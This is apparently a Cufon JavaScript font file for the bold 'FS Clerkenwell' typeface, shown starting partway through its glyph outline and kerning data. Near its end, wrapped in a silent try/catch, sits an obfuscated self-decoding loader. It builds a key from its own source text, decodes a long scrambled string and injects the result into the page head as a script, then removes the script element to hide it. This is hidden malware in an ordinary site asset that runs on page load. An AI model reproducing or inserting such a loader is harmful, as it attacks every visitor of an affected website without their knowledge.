":6,"w":6,"y":4}},{"d":"80,-222v107,-6,149,30,149,112v0,69,-37,110,-117,110r-94,0v1,-9,-2,-22,1,-29r20,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r66,0xm167,-111v0,-53,-14,-86,-69,-82r0,149v-1,13,9,15,23,15v29,0,46,-20,46,-82","w":244},{"d":"80,-222v107,-6,149,30,149,112v0,69,-37,110,-117,110r-94,0v1,-9,-2,-22,1,-29r20,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r66,0xm167,-111v0,-53,-14,-86,-69,-82r0,149v-1,13,9,15,23,15v29,0,46,-20,46,-82xm170,-281v-15,16,-31,59,-64,37r-29,-37v25,-4,34,10,46,19v13,-9,21,-23,47,-19","w":244},{"d":"82,4v-49,0,-59,-31,-57,-87r-19,0r0,-20r19,0r0,-37r-21,0r0,-25r21,0v0,0,-3,-35,15,-37r40,-6r0,43r34,0r5,25r-39,0r0,37r32,0r0,20r-32,0v-1,27,0,54,23,53v8,0,17,-2,22,-4r0,31v-9,3,-25,7,-43,7","w":132},{"d":"108,0r-93,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,122v-1,12,9,10,19,10r0,25xm103,-184v-25,4,-34,-10,-46,-19v-13,9,-21,23,-47,19v16,-15,32,-58,64,-36","w":118},{"d":"127,-33v52,0,23,-95,30,-145v2,-15,-10,-16,-25,-15r0,-29r100,0r0,29r-20,0r0,109v2,55,-30,88,-87,88v-56,0,-88,-32,-88,-86r0,-96v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0v7,55,-22,160,31,160xm166,-247r-8,7v-21,-11,-44,-14,-67,-14v-1,-17,1,-30,17,-30v20,0,39,15,58,37","w":248},{"d":"280,-37r-25,0v-1,13,1,22,16,19r0,18r-67,0r0,-18r15,0r0,-19r-57,0r0,-16r63,-87r30,0r0,83r25,0r0,20xm212,-222r-103,222r-31,0r103,-222r31,0xm107,-127v0,22,-14,46,-53,46v-16,0,-32,-4,-46,-12r9,-25v15,13,52,19,52,-10v0,-15,-9,-20,-26,-19r0,-18v15,1,23,-6,23,-20v0,-24,-30,-16,-46,-10r-7,-23v33,-14,93,-11,90,28v0,12,-6,24,-23,30v19,4,27,14,27,33xm219,-57r0,-43r-32,43r32,0","w":288},{"d":"236,-193r-20,0r0,193r-32,0r-105,-131r0,87v-2,14,10,16,25,15r0,29r-86,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r55,0r106,129r0,-85v2,-15,-10,-16,-25,-15r0,-29r86,0r0,29xm172,-281v-16,16,-31,59,-64,37r-29,-37v26,-4,35,9,47,19v13,-9,21,-23,46,-19","w":253},{"d":"17,-111v0,-83,74,-145,141,-99r2,-12r26,0r0,82v-12,0,-28,3,-30,-9v-3,-20,-6,-39,-33,-40v-26,0,-45,21,-45,75v0,85,56,98,95,59r20,23v-15,18,-44,36,-78,36v-60,0,-98,-42,-98,-115xm147,-254v-23,0,-46,3,-67,14r-8,-7v19,-22,37,-37,57,-37v16,0,20,13,18,30","w":209},{"d":"210,0v-28,-2,-63,7,-69,-17v-30,31,-111,34,-111,-32r0,-91r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v-1,28,34,22,46,8r0,-96r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,120v-1,12,11,13,23,12r0,25xm152,-196r-89,0r0,-23r89,0r0,23","w":216},{"d":"175,-12r-96,-116r0,84v-2,14,10,16,25,15r0,29r-86,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r55,0r106,129r0,-85v2,-15,-10,-16,-25,-15r0,-29r86,0r0,29r-20,0r0,183v6,65,-44,79,-98,63r0,-32v26,7,66,9,57,-33","w":253},{"d":"168,-123r-51,0r-34,-61r-35,61r-51,0r68,-103r35,0","w":164},{"d":"198,0r-180,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r177,0r3,83v-13,0,-27,1,-28,-11v-5,-18,1,-43,-25,-43r-43,0r0,68r25,0v2,-16,5,-30,27,-25r0,77v-12,-1,-22,4,-24,-9r-3,-16r-25,0v4,23,-12,69,15,69r49,0v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm156,-281v-15,16,-31,59,-64,37r-29,-37v25,-4,34,10,46,19v13,-9,21,-23,47,-19","w":219},{"d":"206,-19v0,13,-10,23,-23,23v-13,0,-23,-10,-23,-23v0,-13,10,-23,23,-23v13,0,23,10,23,23xm132,-19v0,13,-11,23,-24,23v-13,0,-23,-10,-23,-23v0,-13,10,-23,23,-23v13,0,24,10,24,23xm58,-19v0,13,-11,23,-24,23v-13,0,-23,-10,-23,-23v0,-13,10,-23,23,-23v13,0,24,10,24,23","w":213},{"d":"179,-82v0,59,-35,87,-84,87v-49,0,-83,-28,-83,-87v0,-59,34,-88,83,-88v49,0,84,29,84,88xm121,-82v0,-35,-7,-53,-26,-53v-19,0,-26,18,-26,53v0,35,7,52,26,52v19,0,26,-17,26,-52xm159,-209v-25,0,-38,8,-56,29r-8,-8v15,-35,33,-47,50,-47v17,0,14,12,14,26xm95,-209v-25,0,-38,8,-56,29r-8,-8v15,-35,32,-47,49,-47v17,-1,15,11,15,26","w":190},{"d":"12,-49v0,-48,48,-54,61,-110r24,0v-3,58,-29,73,-29,104v0,34,42,26,66,16r0,34v-45,20,-122,7,-122,-44xm62,-204v0,-13,10,-23,23,-23v13,0,23,10,23,23v0,13,-10,22,-23,22v-13,0,-23,-9,-23,-22","w":142},{"d":"317,0r-114,0v-22,0,-41,4,-72,4v-68,0,-115,-40,-115,-115v0,-73,49,-115,115,-115v60,0,116,4,180,4r3,83v-13,0,-27,1,-28,-11v-6,-17,0,-43,-25,-43r-44,0r0,68r25,0v3,-15,4,-30,27,-25r0,77v-11,-1,-20,4,-23,-9r-4,-16r-25,0v4,23,-12,69,15,69r49,0v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm122,-35v57,0,32,-69,36,-116v3,-28,-10,-36,-36,-36v-38,0,-45,48,-45,76v0,28,6,76,45,76","w":338,"k":{"y":2,"u":2,"\u00f9":2,"\u00fa":2,"\u00fb":2,"\u0169":2,"\u00fc":2,"\u016b":2,"\u016d":2,"\u016f":2,"\u0171":2,"\u0173":2}},{"d":"228,-193v-20,0,-26,0,-36,18r-46,90v4,23,-13,61,22,56r0,29r-102,0r0,-29r21,0r0,-55r-46,-92v-7,-16,-15,-18,-34,-17r0,-29r103,0r0,29r-15,0r31,63r32,-63r-14,0r0,-29r84,0r0,29xm171,-238v-25,4,-34,-10,-46,-19v-13,9,-21,23,-47,19v15,-16,32,-58,64,-36","w":235,"k":{"Q":4,"q":19,"C":5,"\u0106":5,"\u00c7":5,"\u0108":5,"\u010c":5,"\u010a":5,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":4,"\u00d2":4,"\u00d3":4,"\u00d4":4,"\u00d5":4,"\u00d6":4,"\u014c":4,"\u014e":4,"\u0150":4,"\u00d8":4,"\u01fe":4,"\u0152":4,"e":22,"\u00e8":22,"\u00e9":22,"\u00ea":22,"\u011b":22,"\u00eb":22,"\u0113":22,"\u0115":22,"\u0117":22,"\u0119":22,"A":19,"\u00c0":19,"\u00c1":19,"\u00c2":19,"\u00c3":19,"\u00c4":19,"\u0100":19,"\u0102":19,"\u00c5":19,"\u01fa":19,"\u0104":19,"\u00c6":19,"\u01fc":19,"o":22,"\u00f2":22,"\u00f3":22,"\u00f4":22,"\u00f5":22,"\u00f6":22,"\u014d":22,"\u014f":22,"\u0151":22,"\u00f8":22,"\u01ff":22,"\u0153":22,"a":22,"\u00e0":22,"\u00e1":22,"\u00e2":22,"\u00e3":22,"\u00e4":22,"\u0101":22,"\u0103":22,"\u00e5":22,"\u01fb":22,"\u0105":22,"\u00e6":22,"\u01fd":22}},{"d":"162,0r-148,0v-1,-16,2,-26,9,-35r77,-103v-25,1,-58,-9,-55,25r-28,0r0,-52r144,0v1,18,-1,27,-11,40r-73,98v25,-2,61,10,57,-25r28,0r0,52","w":176},{"d":"120,-164v0,13,-10,23,-23,23v-13,0,-22,-10,-22,-23v0,-13,9,-22,22,-22v13,0,23,9,23,22xm168,-91r-146,0r0,-36r146,0r0,36xm120,-55v0,13,-10,23,-23,23v-13,0,-22,-10,-22,-23v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":189},{"d":"187,-63v0,36,-25,64,-74,67r0,26r-20,0r0,-27v-15,-2,-30,-7,-38,-15r-2,12r-30,0r0,-85v18,0,36,-3,34,18v-3,34,69,47,69,13v0,-13,-13,-22,-49,-35v-29,-10,-58,-26,-58,-68v0,-48,37,-69,74,-69r0,-26r20,0r0,28v12,3,22,7,28,13r2,-11r30,0r0,86v-12,0,-29,3,-30,-9v-2,-23,-14,-43,-40,-43v-16,0,-26,10,-26,23v0,13,12,20,52,35v29,10,58,28,58,67"},{"d":"105,0r-93,0r0,-25r19,0r0,-195r-22,0r-5,-26v34,0,56,-2,69,-2v10,0,13,3,13,11r0,202v0,11,9,10,19,10r0,25xm139,-226v0,17,-9,33,-27,59r-12,-6v7,-12,14,-28,15,-38v-12,0,-19,-8,-19,-17v0,-12,9,-20,21,-20v12,0,22,8,22,22","w":135},{"d":"150,-45v0,46,-75,66,-109,35r-3,10r-20,0r0,-66v15,0,29,-3,28,16v-1,25,48,35,53,11v3,-14,-30,-22,-43,-27v-23,-10,-40,-24,-40,-52v0,-48,73,-67,103,-38r2,-9r20,0r0,65v-17,1,-28,0,-27,-18v1,-26,-45,-29,-47,-7v-1,15,33,23,46,30v22,11,37,24,37,50","w":160},{"d":"127,-33v52,0,23,-95,30,-145v2,-15,-10,-16,-25,-15r0,-29r100,0r0,29r-20,0r0,109v2,55,-30,88,-87,88v-56,0,-88,-32,-88,-86r0,-96v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0v7,55,-22,160,31,160xm169,-247r-89,0r0,-22r89,0r0,22","w":248},{"d":"179,-82v0,59,-35,87,-84,87v-49,0,-83,-28,-83,-87v0,-59,34,-88,83,-88v49,0,84,29,84,88xm121,-82v0,-35,-7,-53,-26,-53v-19,0,-26,18,-26,53v0,35,7,52,26,52v19,0,26,-17,26,-52xm142,-184v-26,4,-34,-10,-47,-19v-13,9,-21,23,-46,19v16,-16,31,-58,64,-36","w":190},{"d":"180,-77r-180,0r0,-25r180,0r0,25","w":180},{"d":"186,-78r-9,78r-152,0r0,-26v19,-26,27,-43,23,-78r-29,0r0,-30r21,0v-13,-53,15,-93,72,-92v27,0,52,7,68,13r-12,37v-20,-10,-74,-22,-72,14v0,9,3,19,6,28r37,0r11,30r-41,0v4,28,-9,49,-27,66r64,0v6,-21,7,-47,40,-40"},{"d":"17,-111v0,-83,74,-145,141,-99r2,-12r26,0r0,82v-12,0,-28,3,-30,-9v-3,-20,-6,-39,-33,-40v-26,0,-45,21,-45,75v0,85,56,98,95,59r20,23v-15,18,-44,36,-78,36v-60,0,-98,-42,-98,-115xm158,-238v-25,4,-34,-10,-46,-19v-13,9,-21,23,-47,19v15,-16,32,-58,64,-36","w":209},{"d":"124,0r-104,0r0,-29r20,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-2,14,10,16,25,15r0,29xm106,-247r-8,7v-21,-11,-44,-14,-67,-14v-1,-17,1,-30,17,-30v20,0,39,15,58,37","w":138},{"d":"94,-170v53,0,80,44,74,97r-100,0v-2,50,51,53,80,29r15,24v-15,14,-43,25,-70,25v-53,0,-83,-35,-83,-87v0,-50,33,-88,84,-88xm116,-98v0,-19,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0xm116,-206v0,13,-10,22,-23,22v-13,0,-22,-9,-22,-22v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":182},{"d":"86,-151v41,-34,102,-22,102,36r0,80v-1,12,9,10,19,10r0,25r-90,0r0,-25r15,0r0,-88v1,-29,-33,-21,-46,-8r0,86v0,11,9,10,19,10r0,25r-93,0r0,-25r19,0r0,-160r-25,0r0,-20r25,0r0,-15r-22,0r-5,-26v34,0,56,-2,69,-2v22,-2,10,26,13,43r54,0r0,20r-54,0r0,34","w":215},{"d":"208,-113v6,43,-37,69,-110,64v-3,17,6,22,24,20r0,29r-104,0r0,-29r21,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,18v71,-2,114,13,110,62xm147,-113v2,-29,-18,-35,-49,-33r0,67v31,3,54,-6,49,-34","w":220},{"d":"194,0v-25,-1,-55,5,-65,-12v-47,40,-122,3,-117,-72v5,-68,48,-98,104,-81r0,-55r-21,0r-5,-26v34,0,55,-2,68,-2v10,0,14,3,14,11r0,201v-2,10,11,12,22,11r0,25xm116,-35r0,-100v-27,-12,-47,-4,-47,52v0,53,22,64,47,48","w":200},{"d":"159,-70r-25,25r-39,-39r-40,39r-24,-25r39,-39r-39,-39r24,-25r40,39r39,-39r25,25r-39,39","w":189},{"d":"157,22r-49,0r-123,-268r49,0","w":141},{"d":"158,0r-113,0r0,-29r30,0r0,-149r-31,0r-6,-29v44,-1,53,-19,95,-15r0,179v-1,13,11,15,25,14r0,29"},{"d":"174,-161v13,47,-99,96,-100,123r64,0v7,-20,7,-47,40,-40r-8,78r-151,0v-3,-53,15,-74,56,-108v31,-26,39,-36,39,-52v0,-35,-55,-26,-79,-15r-10,-39v59,-23,155,-17,149,53"},{"d":"197,0r-179,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-1,28,41,10,63,15v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm139,39v0,17,-9,33,-27,59r-12,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,9,-19,21,-19v12,0,22,8,22,22","w":212},{"d":"102,-226v40,6,9,76,9,95r-20,0v-2,-36,-30,-91,11,-95xm40,-226v40,0,10,59,10,95r-20,0v-3,-23,-11,-58,-11,-72v0,-17,8,-23,21,-23","w":140},{"d":"158,-36r-9,22v-21,-24,-51,-45,-66,-74v14,-28,46,-49,66,-73r9,21r-38,52xm93,-36r-9,22v-21,-24,-51,-45,-66,-74v14,-28,46,-49,66,-73r9,21r-38,52","w":176},{"d":"233,0r-101,0r0,-29r17,0r-12,-38r-63,0r-11,31v0,9,12,7,21,7r0,29r-82,0r0,-29r21,0r75,-193r39,0r69,179v5,12,12,15,27,14r0,29xm128,-93r-21,-62r-23,62r44,0xm163,-247r-90,0r0,-22r90,0r0,22","w":236,"k":{"v":17,"Q":3,"U":10,"V":33,"c":1,"w":17,"y":7,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1}},{"d":"105,0r-93,0r0,-25r19,0r0,-195r-22,0r-5,-26v34,0,56,-2,69,-2v10,0,13,3,13,11r0,202v0,11,9,10,19,10r0,25xm79,39v0,17,-8,33,-26,59r-12,-7v7,-12,13,-27,14,-37v-12,0,-18,-9,-18,-18v0,-12,8,-19,20,-19v12,0,22,8,22,22","w":115},{"d":"72,-185r-8,7v-21,-11,-45,-14,-68,-14v-1,-17,1,-30,18,-30v20,0,39,15,58,37","w":76},{"d":"118,62r-10,16v-120,-42,-120,-284,0,-326r10,16v-56,34,-55,260,0,294","w":119},{"d":"124,0v-30,-3,-52,5,-53,32v-1,19,21,22,34,16r0,21v-28,11,-66,-1,-65,-34v0,-14,7,-29,22,-35r-42,0r0,-29r20,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-2,14,10,16,25,15r0,29","w":138},{"d":"129,-107v-19,-1,-42,4,-48,-10v-18,20,-71,19,-71,-24v0,-26,26,-41,64,-42v2,-31,-28,-23,-53,-14r0,-22v37,-13,92,-13,92,36r0,51v-1,9,8,7,16,7r0,18xm62,-131v18,2,11,-20,12,-34v-23,-2,-36,30,-12,34","w":128},{"d":"270,-102v8,29,-61,62,-63,78r40,0v4,-12,5,-30,26,-25r-6,49r-95,0v-13,-47,60,-70,60,-101v0,-22,-35,-15,-50,-9r-6,-25v36,-15,98,-10,94,33xm204,-222r-102,222r-32,0r103,-222r31,0xm91,-82r-67,0r0,-18r15,0r0,-94r-20,0r-3,-18v28,-1,33,-13,59,-10r0,113v-1,9,7,10,16,9r0,18","w":288},{"d":"104,-214r-90,0r0,-23r90,0r0,23","w":118},{"d":"168,-106r-56,0r0,46r-35,0r0,-46r-55,0r0,-35r55,0r0,-45r35,0r0,45r56,0r0,35xm168,0r-146,0r0,-35r146,0r0,35","w":189},{"d":"166,-30r-143,-64r0,-31r143,-63r0,36r-97,43r97,40r0,39","w":189},{"d":"210,-144v-12,-1,-28,4,-29,-8v-4,-13,0,-41,-16,-41r-24,0r0,149v-2,14,10,16,25,15r0,29r-106,0r0,-29r22,0r0,-164v-15,2,-34,-7,-36,10v-5,13,3,38,-14,39r-19,0r1,-78r194,0xm158,-281v-15,16,-32,58,-64,36r-29,-36v25,-4,34,10,46,19v13,-9,21,-23,47,-19","w":222,"k":{"q":4,"e":6,"\u00e8":6,"\u00e9":6,"\u00ea":6,"\u011b":6,"\u00eb":6,"\u0113":6,"\u0115":6,"\u0117":6,"\u0119":6,"A":14,"\u00c0":14,"\u00c1":14,"\u00c2":14,"\u00c3":14,"\u00c4":14,"\u0100":14,"\u0102":14,"\u00c5":14,"\u01fa":14,"\u0104":14,"\u00c6":14,"\u01fc":14,"o":4,"\u00f2":4,"\u00f3":4,"\u00f4":4,"\u00f5":4,"\u00f6":4,"\u014d":4,"\u014f":4,"\u0151":4,"\u00f8":4,"\u01ff":4,"\u0153":4}},{"d":"57,-76v0,41,61,61,70,23v5,-20,-39,-30,-56,-40v-82,-23,-58,-133,24,-133v21,0,38,6,48,15r1,-11r30,0r0,85v-47,10,-22,-56,-69,-51v-43,5,-28,36,8,51v33,14,75,28,75,74v0,59,-89,87,-131,50r-3,13r-30,0r0,-86v14,1,33,-5,33,10xm139,-254v-23,0,-46,3,-67,14r-8,-7v19,-22,37,-37,57,-37v16,0,20,13,18,30","w":202},{"d":"233,0r-101,0r0,-29r17,0r-12,-38r-63,0r-11,31v0,9,12,7,21,7r0,29r-82,0r0,-29r21,0r75,-193r39,0r69,179v5,12,12,15,27,14r0,29xm128,-93r-21,-62r-23,62r44,0xm163,-238v-25,4,-34,-10,-46,-19v-13,9,-21,23,-46,19v15,-15,31,-58,63,-36","w":236,"k":{"v":17,"Q":3,"U":10,"V":33,"c":1,"w":17,"y":7,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1}},{"d":"127,-33v52,0,23,-95,30,-145v2,-15,-10,-16,-25,-15r0,-29r100,0r0,29r-20,0r0,109v2,55,-30,88,-87,88v-56,0,-88,-32,-88,-86r0,-96v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0v7,55,-22,160,31,160xm171,-238v-26,4,-35,-9,-47,-19v-13,9,-21,23,-46,19v15,-15,31,-58,63,-36","w":248},{"d":"238,-122r-40,0r0,-13r9,0r0,-38r-24,51r-11,0r-28,-51v3,13,-9,40,11,38r0,13r-39,0r0,-13r9,0r0,-67v0,-7,-4,-7,-11,-7r0,-13r27,0r38,70r33,-70r24,0r0,13r-9,0r0,67v0,5,4,8,11,7r0,13xm103,-187v-23,7,-3,-28,-31,-22r0,67v0,7,4,7,11,7r0,13r-47,0r0,-13r10,0r0,-74v-7,1,-16,-3,-16,5v0,10,0,20,-16,17r1,-35r87,0","w":252},{"d":"210,-144v-12,-1,-28,4,-29,-8v-4,-13,0,-41,-16,-41r-24,0r0,149v-2,14,10,16,25,15r0,29r-106,0r0,-29r22,0r0,-164v-15,2,-34,-7,-36,10v-5,13,3,38,-14,39r-19,0r1,-78r194,0xm134,39v0,17,-8,33,-26,59r-13,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,9,-19,21,-19v12,0,22,8,22,22","w":222,"k":{"q":4,"A":14,"\u00c0":14,"\u00c1":14,"\u00c2":14,"\u00c3":14,"\u00c4":14,"\u0100":14,"\u0102":14,"\u00c5":14,"\u01fa":14,"\u0104":14,"\u00c6":14,"\u01fc":14,"e":6,"\u00e8":6,"\u00e9":6,"\u00ea":6,"\u011b":6,"\u00eb":6,"\u0113":6,"\u0115":6,"\u0117":6,"\u0119":6,"o":4,"\u00f2":4,"\u00f3":4,"\u00f4":4,"\u00f5":4,"\u00f6":4,"\u014d":4,"\u014f":4,"\u0151":4,"\u00f8":4,"\u01ff":4,"\u0153":4}},{"d":"180,0v-26,-1,-59,6,-68,-13v-27,27,-100,26,-100,-35v0,-38,37,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v53,-19,130,-20,130,51r0,73v-1,12,12,10,23,10r0,25xm102,-39r0,-44v-24,1,-38,14,-38,30v0,21,27,25,38,14xm136,-222v-2,20,-21,36,-47,36v-26,0,-43,-14,-46,-36r22,0v2,17,48,17,49,0r22,0","w":185},{"d":"127,-33v52,0,23,-95,30,-145v2,-15,-10,-16,-25,-15r0,-29r100,0r0,29r-20,0r0,109v2,55,-30,88,-87,88v-56,0,-88,-32,-88,-86r0,-96v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0v7,55,-22,160,31,160","w":248,"k":{"w":5,"v":5,"q":4,"g":11,"c":6,"e":6,"\u00e8":6,"\u00e9":6,"\u00ea":6,"\u011b":6,"\u00eb":6,"\u0113":6,"\u0115":6,"\u0117":6,"\u0119":6,"i":1,"\u0131":1,"\u00ec":1,"\u00ed":1,"\u00ee":1,"\u0129":1,"\u00ef":1,"\u012b":1,"\u012d":1,"\u012f":1,"\u0133":1}},{"d":"81,-139v50,-27,112,2,112,60v0,40,-26,83,-88,83v-60,0,-87,-46,-87,-108v0,-92,74,-146,157,-111r-9,29v-38,-20,-87,-1,-85,47xm133,-81v0,-42,-30,-44,-55,-27v-2,40,7,86,29,79v19,0,26,-20,26,-52"},{"d":"168,-54r-36,0r0,-75r-110,0r0,-35r123,0v18,0,23,6,23,21r0,89","w":189}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-1124-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("PK:saZcWvyd$P-nV~Z!%)K)dM{cs:Zd$M{D%vypb:UC(HRWuMX?[6Fp^MX?[6FpZMX?[6F5%9U&s6k+hHU&s6kBRcn&s6kBA6!&s6kBA:!&s6k+hcU&s6kBRi!&s6kB%c!&s6k+h6U&s6kB&6s&s6k+hc!&s6k!Z:U&s6kB{:U&s6k+u6s&s6^7&Hs&s6kBAiU&s6k+Z6U&s6k+nc!&s6kBW6n&s6kB&6U&s6kBAi!&s6kB{6n&s6kB&cn&s6k+SiU&s6kBAcs&s6kBAHn&s6kB[:hGSMX?[6F){MX?[6F+uMX?[6KH[MX?[6F!ZMX?%6k!hMX?[6K6[MX?[6Fr[MX?[6KcZMX?[6K)WMX?[6F?{0U&s6k+ncn&s6kBAcU&s6kB{cn&s6k+ncsc5~F7&cF+5~F7&6^D5~F7&ckU5~F7[:ZU5~F7[:k+5~F7%6Fn5~F7&cFS5~F7&6RD5~F7[HFS5~F7[:kc5~F7[:FS5~F7[HR~5~F7[:k)APs&s6k+Zi!&s6k+^cuc5~F7&c^+5~F7&cyU5~F7[:y![MX?[6KB%MX?[6FU^MX?[6Fpnyn&s6k+^:U&s6kBsc!d5~F7&c^!5~F7&cFnkDs&s6kB%:B&X?n&s6kBsHn&s6kBWcK:5~F7[:Zc5~F7&c{:sMX?[6F6@MX?[6F6[MX?[6K:SMX?[6FH@MX?[6y:uMX?[6KH{MX?[6F+hMX?%6kB4Hs&s6kBAHs&s6k+Scn&s6k!Z:n&s6kB%i-f5~F7[HRS5~F7&cZ:5~7+-kB!KX)DPm6ci0rp9F?UyMH:va5~]OjSu^hnZbGf=|(_$T[&%RWs{A4@1VCdxeF7&6yc5~F7&6kn5~F7&c{U5~F7[:FU5~F7&c^c5~F7&6kD5~F7[H{p5~F7[H^n5~F7&6^U5~F7[H{D5~F7[HZ!5~F7&c{!5~F7&6Rc5~F7[:Zp5~F7&6kUpaU&s6k+Z:Z_5~F)[6Fn5~F7&6ZcaMX?[6KUhMX?[6Fr@MX?[6F!uMX?[6FcZPU&s6k+n6FdWMX?[6FB@MX?[6Fr4MX?[6FH4MX?[6F+SMX?[6Fr{MX?[6K:uMX?[6F:^MX?[6FB4MX?[6KUuMX?[6F6AMX?[6F6sa!&s6kB%6s&s6k+h:n&s6kB%:n[TMX?[6K6WMX?[6FrRMX?[6KUZiU&s6kBW:!&s6k+hHs&s6k+Z6s&s6k+nH{d5~F7&cZr$MX?[6F!nHU&s6kB%Hn&s6kBA6s&s6^7&ckfuMX?[6FBWDF+5~F7&6FD5~F7&cFUGMX?[6KBsMX?[6K?@MX?[6F)&cK~5~F7&6k!KMX?[6FBsmU&s6kB&:-:4MX?[6^!um!&s6k)&ik@5~F7&6^n!~As~MX?[6F5&MX?[6FchOn&s6k+ucn&s6kBscs&s6k+uHb(s]MD5~F7[H{BR9W@5~F7&cFc5~F7&6Rpris&s6k+n6n&s6k+Zc?d5~F7[HF+yO!&s6k!Z:!&s6kBWHn&s6k+n6WD5~F7&cRp5~F7&6Z!):U&s6kBRHU&s6k!ZHU&s6k+S:K@5~F7[:kScvU&s6k+ucs&s6kB[cs&s6kBs:B+5~F7[HFp5~F7&cy:&vn&s6k+Z6n&s6k+Scs&s6k+ui!&s6kB[c!&s6k+h:!S5~F7&6R!5~F7[HyU5~F7[:^n5~F7&6Kc?MX?[6y:^MX?[6KD^MX?[6K6&MX?[6K)%MX?[6K)sMX?[6Fr&yM:+MX?[6Kr{MX?[6K)[MX?[6Fh%MX?[6KB&Us&s6k+^iU&s6kB{cU&s6k+^cU&s6kB&6-+5~F7[:F+5~F7[HR64MX?[6F)[p!&s6kB[:U&s6kB{cs&s6k+n:U&s6k+hiU&s6k+u:U&s6kBWcs&s6kB[cn&s6kB{Hn&s6kBWHU@5~F7&6y!5~F)[6^:5~F7&cF!5~F7[HZ:5~F7&cFD5~F7&cR:1MX?[6KHAD!&s6kBR:Mc5~F7&cZ!5~F7[:^p5~F)[6Fc5~F7[HFc5~F7&6kS5~F7[H{c5~F7&6F~5~F7&6^~5~F7[:KUhMX?[6KrAM![&6n&s6kBRHn[uMX?[6K!uMX?[6F7[MX?[6Fc^H-S5~F7&6ZU5~F7[Hy!5~F7[HZp5~F7[Hy:5~F7[H^BCMX?[6FHWMX?[6FUSMX?[6K6%MX?[6KpuMX?%6F)%MX?[6^!SMX?[6F7RUF:5~F7[Hy6umbc[aKnWP-)uP9&f0F7(5ksumb7(aks[mZ&naZ~Wv-&b0y)$:u@baXn[vX6d]AWVvyHGHu@TvRWTMujeib~A~s[$PFCG0RG$Ps[$~{UumM+%:M:f:M~5mZcTM-@svA&W:Mc^aA~faZUZHyn%M-@^a{WfD-dfmbpn5ArGaKd^HMpfa{4$vKdR~K@Say?fPy:T5ujVvF&(i%(|v9nby{cavUs~0M+avUsdP9jf")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":205,"face":{"font-family":"FS Clerkenwell","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 8 3 2 0 0 2 0 4","ascent":"263","descent":"-97","x-height":"5","bbox":"-15 -321 360 100","underline-thickness":"7.2","underline-position":"-40.68","stemh":"29","stemv":"55","unicode-range":"U+0020-U+2122"}}));
;

